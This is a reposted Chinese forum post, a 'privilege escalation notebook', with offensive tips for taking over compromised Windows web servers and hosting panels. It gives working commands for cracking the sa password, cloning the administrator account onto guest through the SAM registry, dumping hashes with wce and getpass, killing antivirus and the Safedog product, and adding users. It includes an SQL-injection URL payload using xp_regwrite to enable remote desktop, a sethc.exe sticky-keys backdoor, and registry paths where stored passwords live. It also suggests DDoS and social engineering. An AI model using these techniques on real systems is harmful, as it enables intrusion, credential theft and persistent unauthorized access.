提权笔记本(5)

【N点虚拟主机】
如何判断是否为你n点虚拟主机?
1.网站存在于npointhost该目录下
2.用户信息在说明(description)这儿看到N点虚拟主机
即可说明服务器存于N点虚拟主机内

N点主机提权思路
One.利用破解脚本破解sa密码.然后直接sa提权
其步骤:在网站根目录有一个host_data的文件夹,进去将其数据库下载,找到hostcs表下的mssqlpass密码(有进行加密),然后用破解脚本(提权仓库有),将sa密文放到破解脚本里面去,然后直接丢到
网站,然后浏览之,即可看到正确的sa密码,然后可sa提权之。

过狗提权/bypasssafedog提权/过够/过狗总结/安全狗/safe dog/safedog
1.直接修改管理员密码
2.直接修改guest
然后reg export "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4" "c:\1.reg" 导出来 下载后修改 把V删除 把1F4改成1F5 然后再导入 就成了
密码就是1了
3.如果说权限是system的话直接用wce.exe直接读取hash(使用方法:)wce.exe -l
4.当然system也可以上远控
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+EXP那些事
+
+ms15-051------------2008 r2
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+提权经验笔录
+
+ ◇.提权前(tasklist)看一下在运行那些东西,看一下有没有杀毒软件之类的.然后对症下药.
+
+ ◇.cmd无法执行/cmd拒绝访问/
+ 1.防护软件拦截taskkill /f /im ZhuDongFangYu.exe
+ 2.cmd被降权
+ 3.组建被删除
+ 解决思路:找一个可读可写的目录上传cmd或者传一个aspx木马
+ 4.可读可写的上传上去了还是拒绝访问,这时候可能是因为没有权限执行,上传一个rar然后解压到可以执行的地方去。就可以解决!
+
+ ◇.有时候net user admin admin /add不行的话就用net user admin /ad
+
+ ◇.有时候明明可以添加上的用户,却没有添加上,试试把密码改的难一些,管理员可能对密码进行了要求的!
+
+ ◇.wscript.shell组件不支持,那就传个aspx马试试,aspx马不需要该组件支持。
+
+ ◇.如果不能直接添加用户,试试修改管理员账号密码:net user adminitrator fuchouzhe //将管理密码修改为fuchouzhe
+
+ ◇.如果systeminfo看到补丁情况(三百个大约为平衡点)很少的话,直接上EXP提权试试
+
+ ◇.[iis6.0exp状况]当使用iis6.0exp提权时候,正在执行“net use” 却返回(提示)“Can not find wmiprvse.exe”
+
+ 此时我们仅需关闭wmiprvse.exe该进程即可.用命令关闭wmiprvse该进程:taskkill /f /t /im .exe
+
+ ◇.有时候程序所对应的端口没有开(例如:mysql开启了却没有开放3306端口),极有可能是被修改了端口
+ 这个其实和寻找终端端口类似,比如有运行mysql却没有开放3306,怎么找出mysql被更改的端口呢。
+ tasklist /svc执行后瞅见mysql运行,找到其对应PID,然后netstat -ano看一下PID对应的端口即可。
+
+ ◇.如何查看终端端口/远程端口/远程终端/远程连接/3389/开3389/远程问题/远程连接/3389连接/开启3389/开启终端端口
+ (1)执行cmd键入“tasklist/svc & netstat -ano”然后找到(svchost.exe)TermService所对应的PID,然后在下面找到PID所对应的端口,即为终端端口
+ 亦或先执行tasklist /svc查看Termserver对应的PID,然后再输入命令netstat -ano找PID对应的开放端口
+ (2)aspx大马哪里直接查看“系统信息”
+ (3)找注册表(注:PortNumber即为远程端口)
+ ①.HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp\
+ ②.HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\PortNumber
+ (4)如果是不知道终端端口的话,尝试一下跑出所有其开放的端口(用nmap跑之)然后试之,亦或可以读取注册表然后日之
+
+ (5)SQL语句直接开启3389/SQL语句直接开启3389
+ [3389注册表位置:HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminalServerDenyTSConnections]
+ [其中键值DenyTSConnections 直接控制着3389的开启和关闭,当该键值为0表示3389开启,1则表示关闭。]
+ [而MSSQL的xp_regwrite的存储过程可以对注册进行修改,我们使用这点就可以简单的修改DenyTSConnections键值,]
+ [从而控制3389的关闭和开启]
+ 开启3389的SQL语句:
xxx.com/fuchou.asp?id=100;exec master.dbo.xp_regwrite’HKEY_LOCAL_MACHINE’,’SYSTEMCurrentControlSetControlTerminal Server’,’fDenyTSConnections’,’REG_DWORD’,0;–
+ 关闭3389的SQL语句:
xxx.com/fuchou.asp?id=100;exec master.dbo.xp_regwrite’HKEY_LOCAL_MACHINE’,’SYSTEMCurrentControlSetControlTerminal Server’,’fDenyTSConnections’,’REG_DWORD’,1;–
+

+
+ ◇.net被禁用/net user不行
+ 解决方法挺多的,试试net1,不行的话上pr,iis6.0试试0day
+
+ ◇.sa提权困难/sa提权问题/
+ 若提示:SQL Server 阻止了对组件 ‘xp_cmdshell‘ 的 过程 ‘sys.xp_cmdshell‘ 的访问,因为此组件已作为此服务器安全配置的一部分而被关闭,
+系统管理员可以通过使用 sp_configure 启用 ‘xp_cmdshell‘。有关启用 ‘xp_cmdshell‘ 的详细信息,请参阅 SQL Server 联机丛书中的 "外围应用配置器"。
+ 则没有开启那个组件的支持.自己开启以下就可以(需根据mssql version数据库版本来搞.在sql exec那里开启.)最终添加命令时(sqlexec)要选择sql servver exec来执行添加用户命令.
+
+ ◇.Active不能创建对象,一个aspx,exp,配合用。如果是iis的试一下iisup.exe,或者执行工具包里的bat

+ 把
试一试。
+
+ ◇.安全狗怎么提权?
+ 如果是system权限直接杀死狗,即可
+ 但是大多数都不是system权限,所以呢,传一个免杀的远控最好不过了
+ 弄一个后门,然后调用任务管理>
‘,关掉安全狗
+ 用杀狗的exp。
+ 把服务器打重启吧,ddos。没事12020/12010如果没有必要最好不要,危害性极大。
+ ◇.shift后门替换位置/shift后门/shift服务后门
+ C:\WINDOWS\system32\sethc.exe
+ C:\WINDOWS\system32\sethc.exe.exe 将sethc.exe换成自己的shft就可以了。
+
+ ◇.cmd执行exp没有回显/exp无回显/exp没有回显/cmd exp 回显/exp cmd 回显/iis6.0无回显/iis6.0没有回显/
+   如果说是这样的话,可以尝试shell里面cmd路径的路径填写exp的路劲,在语句哪儿执行“net user fuchou fuchou /add”
+ 例:
+ cmd路径:c:\windows\temp\iis6.0.exe
+ 语句 :c:\windows\temp\ms08067.exe //也可以直接执行“net user admin admin /add” 如果说直接执行不了,的话
+ 可以再传一个cmd放在语句块执行.例(c:\windows\temp\cmd.exe "net user fuchou fuchou /add")
+
+ ◇.mysqlroot账号密码的查找/mysql root账号密码
+ 1.在敏感文件下查找,比如config之类的
+ 2.在mysql的安装目录下找到mysql该文件夹的目录,再次目录下含有一个user.MYD的文件,下载下来。打开你会root账号密码
+ 3.爆破吧。
+ ◇.getpass使用方法
+ getpass.exe >1.txt
+ [社工演义法]
+
+ ◇.在提权过程当中,实在没办法,必要的时候可以拿服务器的注册所有人和注册的组织来进行社工进而拿下服务器权限!
+
+ ◇.同上也是属于一个社工的思路,如果找到mysql的话可以用mysql的密码当作终端端口的密码来进行登录,说不准有意外收获!
+
+
+
+
+
+
+
+
+
+
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

【转载】注册表中一些敏感的位置/注册表/注册表敏感目录/
HKEY_LOCAL_MACHINESOFTWAREMicrosoftMSSQLServerMSSQLServerSuperSocketNetLibTcp Mssql端口
HKLMSYSTEMCurrentControlSetControlTerminal Server DenyTSConnections 远程终端 值为0 即为开启
HKEY_LOCAL_MACHINESOFTWAREMySQL AB mssql的注册表位置
HKEY_LOCAL_MACHINESOFTWAREHZHOSTCONFIG 华众主机注册表配置位置
HKEY_LOCAL_MACHINESOFTWARECat SoftServ-UDomains1UserList serv-u的用户及密码(su加密)位置
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminalServer WinStationsRDP-Tcp 在该注册表位置PortNumber的值即位3389端口值
HKEY_CURRENT_USERSoftwarePremiumSoftNavicatServers mysql管理工具Navicat的注册表位置,提权运用请谷歌
HKEY_LOCAL_MACHINESYSTEMRAdminv2.0ServerParameters Radmin的配置文件,提权中常将其导出进行进行覆盖提权
HKEY_LOCAL_MACHINESYSTEMControlSet002ServicesMSFtpsvcParametersVirtual Roots IIS注册表全版本泄漏用户路径和FTP用户名漏洞
HKEY_LOCAL_MACHINEsoftwarehzhostconfigSettingsmastersvrpass 华众主机在注册表中保存的mssql、mysql等密码
HKEY_LOCAL_MACHINESYSTEMLIWEIWENSOFTINSTALLFREEADMIN11 星外主机mssql的sa账号密码,双MD5加密
HKEY_LOCAL_MACHINESYSTEMControlSet002ServicesMSFtpsvcParametersVirtual RootsControlSet002 星外ftp的注册表位置,当然也包括ControlSet001、ControlSet003
转载请注明本文链接: http://www.mayidui.net/t2297.html
游客
登录后才可以回帖,登录 或者 注册